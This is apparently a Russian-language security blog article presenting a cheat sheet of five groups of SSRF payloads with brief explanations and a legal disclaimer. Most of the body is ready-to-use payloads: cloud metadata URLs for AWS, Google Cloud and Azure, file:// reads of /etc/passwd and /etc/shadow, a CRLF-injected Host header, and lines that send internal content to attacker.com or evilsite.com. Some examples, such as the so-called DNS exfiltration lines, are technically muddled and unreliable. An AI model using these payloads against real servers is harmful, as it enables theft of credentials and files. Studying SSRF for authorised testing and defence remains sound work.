Мы уже рассказывали про эксплуатация уязвимости SSRF. В этой небольшой статье рассмотрим наиболее часто используемые SSRF пейлоады.
Еще по теме: SSRF-атака на примере прохождения HTB Health
5 часто используемых SSRF пейлоадов
SSRF (Server-Side Request Forgery) — это уязвимость веб-приложения, которая позволяет злоумышленнику отправлять поддельные запросы от имени самого сервера. Пейлоады SSRF представляют собой специально сформированные запросы, которые злоумышленник внедряет в уязвимое веб-приложение с целью выполнения определенных действий или получения конфиденциальной информации.
SSRF пейлоады часто используются для взаимодействия с различными сервисами или системами, как внутренними, так и внешними. Они могут быть использованы для сканирования внутренней сети, извлечения файлов, эксплуатации уязвимостей других систем, перенаправления запросов на вредоносные ресурсы или даже для эксфильтрации данных.
SSRF пейлоады могут включать манипуляции с URL-адресами, использование специальных схем (например, file://, ftp://), эксплойты протокольного smuggling, обращения к метаданным облачных провайдеров и другие техники для достижения своих целей.
Атаки с использованием SSRF противозаконны. Всегда убедитесь в наличии соответствующего разрешения для проведения пентеста и следуйте этическим нормам.
Сканирование внутренней сети
Получение метаданных с инстансов AWS EC2:
1 |
http://169.254.169.254/latest/meta-data/ |
Получение метаданных с инстансов Google Cloud:
1 |
http://metadata.google.internal/computeMetadata/v1/instance/ |
Получение метаданных с инстансов Azure:
1 |
http://169.254.169.254/metadata/v1/ |
Получение файлов
Получение содержимого файла /etc/passwd:
1 |
file:///etc/passwd |
Получение содержимого файла /etc/shadow (если доступно):
1 |
file:///etc/shadow |
Получение содержимого файла boot.ini (Windows):
1 |
file:///c:/boot.ini |
Взаимодействие с внешними сервисами
Получение содержимого внутреннего сайта и отправка его на сервер злоумышленника:
1 |
http://attacker.com/?url=http://internal.site.com/ |
Попытка подключиться к FTP-серверу, управляемому злоумышленником:
1 |
ftp://attacker.com/ |
Протокольный smuggling
Использование протокольного smuggling для изменения заголовка Host:
1 |
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a |
Добавление фрагмента URL для обмана сервера, чтобы он подумал, что запрос предназначен для attacker.com:
1 |
http://internal.site.com:80%23attacker.com |
Эксфильтрация данных через DNS
Использование DNS-запроса для передачи данных на сервер, контролируемый злоумышленником:
1 |
http://attacker.com/?url=http://x.x.x.x/ |
Использование поддомена для эксфильтрации данных на сервер злоумышленника:
1 |
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/ |
Пожалуйста, обратите внимание, что эти пейлоады предоставляются исключительно для информационных целей, и я настоятельно рекомендую воздержаться от их использования для незаконных действий.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Взлом веб-сервера на Windows и Apache через SSRF
- Альтернатива Burp Collaborator для поиска уязвимостей SSRF